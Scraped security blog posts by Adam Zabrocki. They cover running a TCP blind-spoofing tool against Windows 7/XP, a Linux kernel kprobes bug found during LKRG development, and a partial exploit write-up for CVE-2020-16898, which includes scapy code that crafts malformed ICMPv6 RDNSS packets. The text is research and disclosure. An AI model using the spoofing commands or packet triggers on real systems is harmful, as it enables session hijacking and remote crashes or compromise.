sendmsg(4, {msg_name={sa_family=AF_INET, sin_port=htons(21), sin_addr=inet_addr("192.168.1.169")}, msg_namelen=16, msg_iov=[{iov_base="E\0\0(\0\0\0\0@\6\0\0\300\250\1\356\300\250\1\251\277\314\0\25\0\0\0224\0\0VxP\2\26\320\2563\0\0", iov_len=40}], msg_iovlen=1, msg_control=[{cmsg_len=28, cmsg_level=SOL_IP, cmsg_type=IP_PKTINFO, cmsg_data={ipi_ifindex=0, ipi_spec_dst=inet_addr("0.0.0.0"), ipi_addr=inet_addr("0.0.0.0")}}], msg_controllen=32, msg_flags=0}, 0) = 40

cmsg_len and msg_controllen has different values. However, I didn’t modify the source code so how is it possible? Some GCC/Glibc changes broke the functionality of sending the spoofed package. I’ve found the answer here:

https://sourceware.org/pipermail/libc-alpha/2016-May/071274.html

I needed to rewrite spoofing function to make it functional again on the modern Linux environment. However, to do that I needed to use different API. I wonder how many non-offensive tools were broken by this change 🙂

Windows 7

I’ve tested this tool against fully updated Windows 7. Surprisingly, rewriting PoC was not the most difficult task… setting up a fully updated Windows 7 is much more problematic. Many updates break update channel/service(!) itself and you need to manually fix it. Usually, it means manual downloading of the specific KB and installing it in “safe mode”. Then it can “unlock” update service and you can continue your work. In the end it took me around 2-3 days to get fully updated Windows 7 and it looks like this:

192.168.1.132 – attacker’s IP address
192.168.1.238 – victim’s Windows 7 machine IP address
192.168.1.169 – FTP server running on Linux. I’ve tested ProFTPd and vsFTP servers running under git TOT kernel (5.11+)

This tool does not do appropriate “tuning” per victim which could significantly speed-up the attack. However, in my specific case, the full attack which means finding client’s port address, finding server’s SQN and finding client’s SQN took about 45 minutes.

I found old logs from attacking Windows XP (~2009) and the entire attack took almost an hour:

pi3-darkstar z_new # time ./test -r 192.168.254.20 -s 192.168.254.46 -l 192.168.254.31 -p 21 -P 5357 -c 49450 -C “PWD”

                …::: -=[ [d]evil_pi3 TCP/IP Blind Spoofer by Adam ‘pi3’ Zabrocki ]=- :::…

        [+] Trying to find client port
        [+] Found port => 49456!
        [+] Veryfing… OK! 🙂

        [+] Second level of verifcation
        [+] Found port => 49456!
        [+] Veryfing… OK! 🙂

        [!!] Port is found (49456)! Let’s go further…

        [+] Trying to find server’s window SQN
       [+] Found server’s window SQN => 1874825280, with ACK => 758086748 with seq_offset => 65535
        [+] Rechecking…
       [+] Found server’s window SQN => 1874825280, with ACK => 758086748 with seq_offset => 65535

        [!!] SQN => 1874825280, with seq_offset => 65535

        [+] Trying to find server’s real SQN
        [+] Found server’s real SQN => 1874825279 => seq_offset 32767
        [+] Found server’s real SQN => 1874825277 => seq_offset 16383
        [+] Found server’s real SQN => 1874825275 => seq_offset 8191
        [+] Found server’s real SQN => 1874825273 => seq_offset 4095
        [+] Found server’s real SQN => 1874823224 => seq_offset 2047
        [+] Found server’s real SQN => 1874822199 => seq_offset 1023
        [+] Found server’s real SQN => 1874821686 => seq_offset 511
        [+] Found server’s real SQN => 1874821684 => seq_offset 255
        [+] Found server’s real SQN => 1874821555 => seq_offset 127
        [+] Found server’s real SQN => 1874821553 => seq_offset 63
        [+] Found server’s real SQN => 1874821520 => seq_offset 31
        [+] Found server’s real SQN => 1874821518 => seq_offset 15
        [+] Found server’s real SQN => 1874821509 => seq_offset 7
        [+] Found server’s real SQN => 1874821507 => seq_offset 3
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Rechecking…
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Found server’s real SQN => 1874821505 => seq_offset 1

        [!!] Real server’s SQN => 1874821505

        [+] Finish! check whether command was injected (should be :))

        [!] Next SQN [1874822706]

real    56m38.321s
user    0m8.955s
sys     0m29.181s
pi3-darkstar z_new #

Some more notes:

  • Sometimes you can see that tool is spinning around the same value when trying to find “server’s real SQN”. If next to the number in the parentheses you see number 1, kill the attack, copy calculated SQN (the one around which value tool was spinning) and paste it as an SQN start parameter (-M). It should fix that edge case.
  • Sometimes you can encounter the problem that scanning by 64KB window size can ‘overjump’ the appropriate SQN brackets. You might want to reduce the window size to be smaller. However, tools should change the window size automatically if it finishes scanning the full SQN range with current window size and didn’t find the correct value. Nevertheless, it takes time. You might want to start scanning with the smaller window size (but that implies longer attack).
  • By default, tool sends ICMP message to the victim’s machine to read IP_ID. However, I’ve implemented functionality that it can read that field from any IP packet. It sends standard SYN packet and waits for reply to extract IP_ID. Please give an appropriate TCP port to appropriate parameter (-P)

Tool can be found here:

http://site.pi3.com.pl/exp/devil_pi3.c

Closing words

Modern operating systems (like Windows 10) usually implement IP_ID as a “local” counter per session. If you monitor IP_ID in specific session, you can see it is just incremented per each sent packet. However, each session has independent IP_ID base.

Happy hacking,
Adam

The short story of broken KRETPROBES and OPTIMIZER in Linux Kernel

The short story of broken KRETPROBES and OPTIMIZER in Linux Kernel.

During the LKRG development process I’ve found that:

  • KRETPROBES are broken since kernel 5.8 (fixed in upcoming kernel)
  • OPTIMIZER was not doing sufficient job since kernel 5.5

First things first – KPROBES and FTRACE:

Linux kernel provides 2 amazing frameworks for hooking – K*ROBES and FTRACE. K*PROBES is older and a classic one – introduced in 2.6.9 (October 2004). However, FTRACE is a newer interface and might have smaller overhead comparing to K*PROBES. I’m using a word “K*PROBES” because various types of K*PROBES were availble in the kernel, including JPROBES, KRETPROBES or classic KPROBES. K*PROBES essentially enables the possibility to dynamically break into any kernel routine. What are the differences between various K*PROBES?

  • KPROBES – can be placed on virtually any instruction in the kernel
  • JPROBES – were implemented using KPROBES. The main idea behind JPROBES was to employ a simple mirroring principle to allow seamless access to the probed function’s arguments. However, since 2017 JPROBEs were depreciated. More information can be found here:
    https://lwn.net/Articles/735667/
  • KRETPROBES – sometimes they are called “return probes” and they also use KPROBES under-the-hood. KRETPROBES allows to easily execute user’s own routine at the entry and return path to the hooked function.However, KRETPROBES can’t be placed on arbitrary instructions.

When a KPROBE is registered, it makes a copy of the probed instruction and replaces the first byte(s) of the probed instruction with a breakpoint instruction (e.g., int3 on i386 and x86_64).

FTRACE are newer comparing to K*PROBES and were initially introduced in kernel 2.6.27, which was released on October 9, 2008. FTRACE works completely differently and the main idea is based on instrumenting every compiled function (injecting a “long-NOP” instruction – GCC’s option “-pg”). When FTRACE is being registered on the specific function, such “long-NOP” is being replaced with JUMP instruction which points to the trampoline code. Later such trampoline can execute any pre-registered user-defined hook.

A few words about Linux Kernel Runtime Guard (LKRG)

In short, LKRG performs runtime integrity checking of the Linux kernel (similar to PatchGuard technology from Microsoft) and detection of the various exploits against the kernel. LKRG attempts to post-detect and promptly respond to unauthorized modifications to the running Linux kernel (system integrity) or to corruption of the task integrity such as credentials (user/group IDs), SECCOMP/sandbox rules, namespaces, and more.
To be able to implement such functionality, LKRG must place various hooks in the kernel. KRETPROBES are used to fulfill that requirement.

LKRG’s KPROBE on FTRACE instrumented functions

A careful reader might ask an interesting question: what will happen if the function is instrumented by the FTRACE (injected “long-NOP”) and someone registers K*PROBES on it? Does dynamically registered FTRACE “overwrite” K*PROBES installed on that function and vice versa?

Well, this is a very common situation from LKRG’s perspective, since it is placing KRETPROBES on many syscalls. Linux kernel uses a special type of K*PROBES in such case and it is called “FTRACE-based KPROBES”. Essentially, such special KPROBE is using FTRACE infrastructure and has very little to do with KPROBES itself. That’s interesting because it is also subject to FTRACE rules e.g. if you disable FTRACE infrastructure, such special KPROBE won’t work either.

OPTIMIZER

Linux kernel developers went one step forward and they aggressively “optimize” all K*PROBES to use FTRACE instead. The main reason behind that is performance – FTRACE has smaller overhead. If for any reason such KPROBE can’t be optimized, then classic old-school KPROBES infrastructure is used.

When you analyze all KRETPROBES placed by LKRG, you will realize that on modern kernels all of them are being converted to some type of FTRACE 🙂

LKRG reports False Positives

After such a long introduction finally, we can move on to the topic of this article. Vitaly Chikunov from ALT Linux reported that when he runs FTRACE stress tester, LKRG reports corruption of .text section:

https://github.com/openwall/lkrg/issues/12

I spent a few weeks (month+) on making LKRG detect and accept authorized third-party modifications to the kernel’s code placed via FTRACE. When I finally finished that work, I realized that additionally, I need to protect the global FTRACE knob (sysctl kernel.ftrace_enabled), which allows root to completely disable FTRACE on a running system. Otherwise, LKRG’s hooks might be unknowingly disabled, which not only disables its protections (kind of OK under a threat model where we trust host root), but may also lead to false positives (as without the hooks LKRG wouldn’t know which modifications are legitimate). I’ve added that functionality, and everything was working fine…
… until kernel 5.9. This completely surprised me. I’ve not seen any significant changes between 5.8.x and 5.9.x in FTRACE logic. I spent some time on that and finally I realized that my protection of global FTRACE knob stopped working on latest kernels (since 5.9). However, this code was not changed between kernel 5.8.x and 5.9.x. What’s the mystery?

First problem – KRETPROBES are broken.

Starting from kernel 5.8 all non-optimized KRETPROBES don’t work. Until 5.8, when #DB exception was raised, entry to the NMI was not fully performed. Among others, the following logic was executed:
https://elixir.bootlin.com/linux/v5.7.19/source/arch/x86/kernel/traps.c#L589

if (!user_mode(regs)) {
    rcu_nmi_enter();
    preempt_disable();
}

In some older kernels function ist_enter() was called instead. Inside this function we can see the following logic:
https://elixir.bootlin.com/linux/v5.7.19/source/arch/x86/kernel/traps.c#L91

if (user_mode(regs)) {
    RCU_LOCKDEP_WARN(!rcu_is_watching(), "entry code didn't wake RCU");
} else {
    /*
     * We might have interrupted pretty much anything.  In
     * fact, if we're a machine check, we can even interrupt
     * NMI processing.  We don't want in_nmi() to return true,
     * but we need to notify RCU.
     */
    rcu_nmi_enter();
}

preempt_disable();

As the comment says “We don’t want in_nmi() to return true, but we need to notify RCU.“. However, since kernel 5.8 the logic of how interrupts are handled was modified and currently we have this (function “exc_int3“):
https://elixir.bootlin.com/linux/v5.8/source/arch/x86/kernel/traps.c#L630

/*
 * idtentry_enter_user() uses static_branch_{,un}likely() and therefore
 * can trigger INT3, hence poke_int3_handler() must be done
 * before. If the entry came from kernel mode, then use nmi_enter()
 * because the INT3 could have been hit in any context including
 * NMI.
 */
if (user_mode(regs)) {
    idtentry_enter_user(regs);
    instrumentation_begin();
    do_int3_user(regs);
    instrumentation_end();
    idtentry_exit_user(regs);
} else {
    nmi_enter();
    instrumentation_begin();
    trace_hardirqs_off_finish();
    if (!do_int3(regs))
        die("int3", regs, 0);
    if (regs->flags & X86_EFLAGS_IF)
        trace_hardirqs_on_prepare();
    instrumentation_end();
    nmi_exit();
}

The root of unlucky change comes from this commit:

https://github.com/torvalds/linux/commit/0d00449c7a28a1514595630735df383dec606812#diff-51ce909c2f65ed9cc668bc36cc3c18528541d8a10e84287874cd37a5918abae5

which was later modified by this commit:

https://github.com/torvalds/linux/commit/8edd7e37aed8b9df938a63f0b0259c70569ce3d2

and this is what we currently have in all kernels since 5.8. Essentially, KRETPROBES are not working since these commits. We have the following logic:

asm_exc_int3() -> exc_int3():
                    |
    ----------------|
    |
    v
...
nmi_enter();
...
if (!do_int3(regs))
       |
  -----|
  |
  v
do_int3() -> kprobe_int3_handler():
                    |
    ----------------|
    |
    v
...
if (!p->pre_handler || !p->pre_handler(p, regs))
                             |
    -------------------------|
    |
    v
...
pre_handler_kretprobe():
...
    if (unlikely(in_nmi())) {
        rp->nmissed++;
        return 0;
    }

Essentially, exc_int3() calls nmi_enter(), and pre_handler_kretprobe() before invoking any registered KPROBE verifies if it is not in NMI via in_nmi() call.

I’ve reported this issue to the maintainers and it was addressed and correctly fixed. These patches are going to be backported to the stable tree (and hopefully to LTS kernels as well):

https://lists.openwall.net/linux-kernel/2020/12/09/1313

However, coming back to the original problem with LKRG… I didn’t see any issues with kernel 5.8.x but with 5.9.x. It’s interesting because KRETPROBES were broken in 5.8.x as well. So what’s going on?

As I mentioned at the beginning of the article, K*PROBES are aggressively optimized and converted to FTRACE. In kernel 5.8.x LKRG’s hook was correctly optimized and didn’t use KRETPROBES at all. That’s why I didn’t see any problems with this version. However, for some reasons, such optimization was not possible in kernel 5.9.x. This results in placing classic non-optimized KRETPROBES which we know is broken.

Second problem – OPTIMIZER isn’t doing sufficient job anymore.

I didn’t see any changes in the sources regarding the OPTIMIZER, neither in the hooked function itself. However, when I looked at the generated vmlinux binary, I saw that GCC generated a padding at the end of the hooked function using INT3 opcode:

...
ffffffff8130528b:       41 bd f0 ff ff ff       mov    $0xfffffff0,%r13d
ffffffff81305291:       e9 fe fe ff ff          jmpq   ffffffff81305194
ffffffff81305296:       cc                      int3
ffffffff81305297:       cc                      int3
ffffffff81305298:       cc                      int3
ffffffff81305299:       cc                      int3
ffffffff8130529a:       cc                      int3
ffffffff8130529b:       cc                      int3
ffffffff8130529c:       cc                      int3
ffffffff8130529d:       cc                      int3
ffffffff8130529e:       cc                      int3
ffffffff8130529f:       cc                      int3

Such padding didn’t exist in this function in generated images for older kernels. Nevertheless, such padding is pretty common.

OPTIMIZER logic fails here:

try_to_optimize_kprobe() -> alloc_aggr_kprobe() -> __prepare_optimized_kprobe()
-> arch_prepare_optimized_kprobe() -> can_optimize():
/* Decode instructions */
addr = paddr - offset;
while (addr < paddr - offset + size) { /* Decode until function end */
    unsigned long recovered_insn;
    if (search_exception_tables(addr))
        /*
         * Since some fixup code will jumps into this function,
         * we can't optimize kprobe in this function.
         */
        return 0;
    recovered_insn = recover_probed_instruction(buf, addr);
    if (!recovered_insn)
        return 0;
    kernel_insn_init(&insn, (void *)recovered_insn, MAX_INSN_SIZE);
    insn_get_length(&insn);
    /* Another subsystem puts a breakpoint */
    if (insn.opcode.bytes[0] == INT3_INSN_OPCODE)
        return 0;
    /* Recover address */
    insn.kaddr = (void *)addr;
    insn.next_byte = (void *)(addr + insn.length);
    /* Check any instructions don't jump into target */
    if (insn_is_indirect_jump(&insn) ||
        insn_jump_into_range(&insn, paddr + INT3_INSN_SIZE,
                 DISP32_SIZE))
        return 0;
    addr += insn.length;
}

One of the checks tries to protect from the situation when another subsystem puts a breakpoint there as well:

    /* Another subsystem puts a breakpoint */
    if (insn.opcode.bytes[0] == INT3_INSN_OPCODE)
        return 0;

However, that’s not the case here. INT3_INSN_OPCODE is placed at the end of the function as padding.
I wanted to find out why INT3 padding is more common in the new kernels while it’s not the case for older ones even though I’m using exactly the same compiler and linker. I’ve started browsing commits and I’ve found this one:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7705dc8557973d8ad8f10840f61d8ec805695e9e

diff --git a/arch/x86/kernel/vmlinux.lds.S b/arch/x86/kernel/vmlinux.lds.S
index b06d6e1188deb..3a1a819da1376 100644
--- a/arch/x86/kernel/vmlinux.lds.S
+++ b/arch/x86/kernel/vmlinux.lds.S
@@ -144,7 +144,7 @@ SECTIONS
 		*(.text.__x86.indirect_thunk)
 		__indirect_thunk_end = .;
 #endif
-	} :text = 0x9090
+	} :text =0xcccc
 
 	/* End of text section, which should occupy whole number of pages */
 	_etext = .;

It looks like INT3 is now a default padding used by the linker.

I’ve brought up that problem with the Linux kernel developers (KPROBES owners), and Masami Hiramatsu prepared appropriate patch which fixes the problem:

https://lists.openwall.net/linux-kernel/2020/12/11/265

I’ve verified it and now it works well. Thanks to LKRG development work we helped identify and fix two interesting problems in Linux kernel 🙂

Thanks,
Adam

CVE-2020-16898 – Exploiting “Bad Neighbor” vulnerability

Introduction

During the last Patch Tuesday (13th of October 2020), Microsoft fixed a very interesting (and sexy) vulnerability: CVE-2020-16898 – Windows TCP/IP Remote Code Execution Vulnerability (link). Microsoft’s description of the vulnerability:

“A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain the ability to execute code on the target server or client.
To exploit this vulnerability, an attacker would have to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.
The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement packets.”

This vulnerability is so important that I’ve decided to write a Proof-of-Concept for it. During my work there weren’t any public exploits for it. I’ve spent a significant amount of time analyzing all the necessary caveats needed for triggering the bug. Even now, available information doesn’t provide sufficient details for triggering the bug. That’s why I’ve decided to summarize my experience. First, short summary:

  • This bug can ONLY be exploited when source address is link-local IPv6. This requirement is limiting the potential targets!
  • The entire payload must be a valid IPv6 packet. If you screw-up headers too much, your packet will be rejected before triggering the bug
  • During the process of validating the size of the packet, all defined “length” in Optional headers must match the packet size
  • This vulnerability allows to smuggle an extra “header”. This header is not validated and includes “Length” field. After triggering the bug, this field will be inspected against the packet size anyway.
  • Windows NDIS API, which can trigger the bug, has a very annoying optimization (from the exploitation perspective). To be able to bypass it, you need to use fragmentation! Otherwise, you can trigger the bug, but it won’t result in memory corruption!

Collecting information about the vulnerability

At first, I wanted to learn more about the bug. The only extra information which I could find were the write-ups provided by the detection logic. This is quite a funny twist of fate that the information on how to protect against attack was helpful in exploitation 🙂 Write-ups:

The most crucial is the following information:

“While we ignore all Options that aren’t RDNSS, for Option Type = 25 (RDNSS), we check to see if the Length (second byte in the Option) is an even number. If it is, we flag it. If not, we continue. Since the Length is counted in increments of 8 bytes, we multiply the Length by 8 and jump ahead that many bytes to get to the start of the next Option (subtracting 1 to account for the length byte we’ve already consumed).”

OK, what we have learned from it? Quite a lot:

  • We need to send RDNSS packet
  • The problem is an even number in the Length field
  • Function responsible for parsing the packet will reference the last 8 bytes of RDNSS payload as a next header

That’s more than enough to start poking around. First, we need to generate a valid RDNSS packet.

RDNSS

Recursive DNS Server Option (RDNSS) is one of the sub-options for Router Advertisement (RA) message. RA can be sent via ICMPv6. Let’s look at the documentation for RDNSS (https://tools.ietf.org/html/rfc5006):

5.1. Recursive DNS Server Option
The RDNSS option contains one or more IPv6 addresses of recursive DNS
servers. All of the addresses share the same lifetime value. If it
is desirable to have different lifetime values, multiple RDNSS
options can be used. Figure 1 shows the format of the RDNSS option.

  0                   1                   2                   3
  0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |     Type      |     Length    |           Reserved            |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                           Lifetime                            |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                                                               |
 :            Addresses of IPv6 Recursive DNS Servers            :
 |                                                               |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Description of the Length field:

 Length        8-bit unsigned integer.  The length of the option
               (including the Type and Length fields) is in units of
               8 octets.  The minimum value is 3 if one IPv6 address
               is contained in the option.  Every additional RDNSS
               address increases the length by 2.  The Length field
               is used by the receiver to determine the number of
               IPv6 addresses in the option.

This essentially means that Length must always be an odd number as long as there is any payload.
OK, let’s create a RDNSS package. How to do it? I’m using scapy since it’s the easiest and fasted way for creating any packages which we want. It is very simple:

v6_dst = <destination address>
v6_src = <source address>

c = ICMPv6NDOptRDNSS()
c.len = 7
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

When we set-up a kernel debugger and analyze all the public symbols from the tcpip.sys driver we can find interesting function names:

tcpip!Ipv6pHandleRouterAdvertisement
tcpip!Ipv6pUpdateRDNSS

Let’s try to set the breakpoints there and see if our package arrives:

0: kd> bp tcpip!Ipv6pUpdateRDNSS
0: kd> bp tcpip!Ipv6pHandleRouterAdvertisement
0: kd> g
Breakpoint 0 hit
tcpip!Ipv6pHandleRouterAdvertisement:
fffff804`483ba398 48895c2408      mov     qword ptr [rsp+8],rbx
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a66ad8 fffff804`483c04e0 tcpip!Ipv6pHandleRouterAdvertisement
01 fffff804`48a66ae0 fffff804`4839487a tcpip!Icmpv6ReceiveDatagrams+0x340
02 fffff804`48a66cb0 fffff804`483cb998 tcpip!IppProcessDeliverList+0x30a
03 fffff804`48a66da0 fffff804`483906df tcpip!IppReceiveHeaderBatch+0x228
04 fffff804`48a66ea0 fffff804`4839037c tcpip!IppFlcReceivePacketsCore+0x34f
05 fffff804`48a66fb0 fffff804`483b24ce tcpip!IpFlcReceivePackets+0xc
06 fffff804`48a66fe0 fffff804`483b19a2 tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x25e
07 fffff804`48a670d0 fffff804`45a4f698 tcpip!FlReceiveNetBufferListChainCalloutRoutine+0xd2
08 fffff804`48a67200 fffff804`45a4f60d nt!KeExpandKernelStackAndCalloutInternal+0x78
09 fffff804`48a67270 fffff804`483a1741 nt!KeExpandKernelStackAndCalloutEx+0x1d
0a fffff804`48a672b0 fffff804`4820b530 tcpip!FlReceiveNetBufferListChain+0x311
0b fffff804`48a67550 ffffcb82`f9dfb370 0xfffff804`4820b530
0c fffff804`48a67558 fffff804`48a676b0 0xffffcb82`f9dfb370
0d fffff804`48a67560 00000000`00000000 0xfffff804`48a676b0
0: kd> g
...

Hm… OK. We never hit Ipv6pUpdateRDNSS but we did hit Ipv6pHandleRouterAdvertisement. This means that our package is fine. Why the hell we did not end up in Ipv6pUpdateRDNSS?

Problem 1 – IPv6 link-local address

We are failing validation of the address here:

fffff804`483ba4b4 458a02          mov     r8b,byte ptr [r10]
fffff804`483ba4b7 8d5101          lea     edx,[rcx+1]
fffff804`483ba4ba 8d5902          lea     ebx,[rcx+2]
fffff804`483ba4bd 41b7c0          mov     r15b,0C0h
fffff804`483ba4c0 4180f8ff        cmp     r8b,0FFh
fffff804`483ba4c4 0f84a8820b00    je      tcpip!Ipv6pHandleRouterAdvertisement+0xb83da (fffff804`48472772)
fffff804`483ba4ca 33c0            xor     eax,eax
fffff804`483ba4cc 498bca          mov     rcx,r10
fffff804`483ba4cf 48898570010000  mov     qword ptr [rbp+170h],rax
fffff804`483ba4d6 48898578010000  mov     qword ptr [rbp+178h],rax
fffff804`483ba4dd 4484d2          test    dl,r10b
fffff804`483ba4e0 0f8599820b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb83e7 (fffff804`4847277f)
fffff804`483ba4e6 4180f8fe        cmp     r8b,0FEh
fffff804`483ba4ea 0f85ab820b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb8403 (fffff804`4847279b) [br=0]

r10 points to the beginning of the address:

0: kd> dq @r10
ffffcb82`f9a5b03a  000052b0`80db12fd e5f5087c`645d7b5d
ffffcb82`f9a5b04a  000052b0`80db12fd b7220a02`ea3b3a4d
ffffcb82`f9a5b05a  08070800`e56c0086 00000000`00000000
ffffcb82`f9a5b06a  ffffffff`00000719 aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b07a  aaaaaaaa`aaaaaaaa aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b08a  aaaaaaaa`aaaaaaaa aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b09a  aaaaaaaa`aaaaaaaa 63733a6e`12990c28
ffffcb82`f9a5b0aa  70752d73`616d6568 643a6772`6f2d706e

These bytes:

ffffcb82`f9a5b03a  000052b0`80db12fd e5f5087c`645d7b5d

are matching my IPv6 address which I’ve used as a source address:

v6_src = "fd12:db80:b052:0:5d7b:5d64:7c08:f5e5"

It is compared with byte 0xFE. By looking here We can learn that:

fe80::/10 — Addresses in the link-local prefix are only valid and unique on a single link (comparable to the auto-configuration addresses 169.254.0.0/16 of IPv4).

OK, so it is looking for the link-local prefix. Another interesting check is when we fail the previous one:

fffff804`4847279b e8f497f8ff      call    tcpip!IN6_IS_ADDR_LOOPBACK (fffff804`483fbf94)
fffff804`484727a0 84c0            test    al,al
fffff804`484727a2 0f85567df4ff    jne     tcpip!Ipv6pHandleRouterAdvertisement+0x166 (fffff804`483ba4fe)
fffff804`484727a8 4180f8fe        cmp     r8b,0FEh
fffff804`484727ac 7515            jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb842b (fffff804`484727c3)

It is checking if we are coming from the LOOPBACK, and next we are validated again for being the link-local. I’ve modified the packet to use link-local address and…

Breakpoint 1 hit
tcpip!Ipv6pUpdateRDNSS:
fffff804`4852a534 4055            push    rbp
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a66728 fffff804`48472cbf tcpip!Ipv6pUpdateRDNSS
01 fffff804`48a66730 fffff804`483c04e0 tcpip!Ipv6pHandleRouterAdvertisement+0xb8927
02 fffff804`48a66ae0 fffff804`4839487a tcpip!Icmpv6ReceiveDatagrams+0x340
03 fffff804`48a66cb0 fffff804`483cb998 tcpip!IppProcessDeliverList+0x30a
04 fffff804`48a66da0 fffff804`483906df tcpip!IppReceiveHeaderBatch+0x228
05 fffff804`48a66ea0 fffff804`4839037c tcpip!IppFlcReceivePacketsCore+0x34f
06 fffff804`48a66fb0 fffff804`483b24ce tcpip!IpFlcReceivePackets+0xc
07 fffff804`48a66fe0 fffff804`483b19a2 tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x25e
08 fffff804`48a670d0 fffff804`45a4f698 tcpip!FlReceiveNetBufferListChainCalloutRoutine+0xd2
09 fffff804`48a67200 fffff804`45a4f60d nt!KeExpandKernelStackAndCalloutInternal+0x78
0a fffff804`48a67270 fffff804`483a1741 nt!KeExpandKernelStackAndCalloutEx+0x1d
0b fffff804`48a672b0 fffff804`4820b530 tcpip!FlReceiveNetBufferListChain+0x311
0c fffff804`48a67550 ffffcb82`f9dfb370 0xfffff804`4820b530
0d fffff804`48a67558 fffff804`48a676b0 0xffffcb82`f9dfb370
0e fffff804`48a67560 00000000`00000000 0xfffff804`48a676b0

Works! OK, let’s move to the triggering bug phase.

Triggering the bug

What we know from the detection logic write-up:

“we check to see if the Length (second byte in the Option) is an even number”

Let’s test it:

v6_dst = <destination address>
v6_src = <source address>

c = ICMPv6NDOptRDNSS()
c.len = 6
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

and we end up executing this code:

fffff804`4852a5b3 4c8b15be8b0700  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)]
fffff804`4852a5ba e8113bceff      call    fffff804`4820e0d0
fffff804`4852a5bf 418bd7          mov     edx,r15d
fffff804`4852a5c2 498bce          mov     rcx,r14
fffff804`4852a5c5 488bd8          mov     rbx,rax
fffff804`4852a5c8 e8a39de5ff      call    tcpip!NetioAdvanceNetBuffer (fffff804`48384370)
fffff804`4852a5cd 0fb64301        movzx   eax,byte ptr [rbx+1]
fffff804`4852a5d1 8d4e01          lea     ecx,[rsi+1]
fffff804`4852a5d4 2bc6            sub     eax,esi
fffff804`4852a5d6 4183cfff        or      r15d,0FFFFFFFFh
fffff804`4852a5da 99              cdq
fffff804`4852a5db f7f9            idiv    eax,ecx
fffff804`4852a5dd 8b5304          mov     edx,dword ptr [rbx+4]
fffff804`4852a5e0 8945b7          mov     dword ptr [rbp-49h],eax
fffff804`4852a5e3 8bf0            mov     esi,eax
fffff804`4852a5e5 413bd7          cmp     edx,r15d
fffff804`4852a5e8 7412            je      tcpip!Ipv6pUpdateRDNSS+0xc8 (fffff804`4852a5fc)

Essentially, it subtracts 1 from the Length field and the result is divided by 2. This follows the documentation logic and can be summarized as:

tmp = (Length - 1) / 2

This logic generates the same result for the odd and even number:

(8 – 1) / 2 => 3
(7 – 1) / 2 => 3

There is nothing wrong with that by itself. However, this also “defines” how long is the package. Since IPv6 addresses are 16 bytes long, by providing even number, the last 8 bytes of the payload will be used as a beginning of the next header. We can see that in the Wireshark as well:

Zdjęcie

That’s pretty interesting. However, what to do with that? What next header should we fake? Why this matters at all? Well… it took me some time to figure this out. To be honest, I wrote a simple fuzzer to find it out 🙂

Hunting for the correct header(s) (Problem 2)

If we look in the documentation at the available headers / options, we don’t really know which one to use (https://www.iana.org/assignments/icmpv6-parameters/icmpv6-parameters.xml):

What we do know is that ICMPv6 messages have the following general format:

       0                   1                   2                   3
       0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |     Type      |     Code      |          Checksum             |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |                                                               |
      +                         Message Body                          +
      |                                                               |

First byte is encoding “type” of the package. I’ve made the test and I’ve generated next header to be exactly the same as the “buggy” RDNSS one. I’ve been hitting breakpoint for tcpip!Ipv6pUpdateRDNSS but tcpip!Ipv6pHandleRouterAdvertisement was hit only once. I’ve run my IDA Pro and started to analyze what’s going on and what logic is being executed. After some reverse engineering I realized that we have 2 loops in the code:

  1. First loop goes through all the headers and does some basic validation (size of length etc)
  2. Second loop doesn’t do any more validation but parses the package.

As soon as there are more ‘optional headers’ in the buffer, we are in the loop. That’s a very good primitive! Anyway, I still don’t know what headers should be used and to find it out I had been brute-forcing all the ‘optional header’ types in the triggered bug and found out that second loop cares only about:

  • Type 3 (Prefix Information)
  • Type 24 (Route Information)
  • Type 25 (RDNSS)
  • Type 31 (DNS Search List Option)

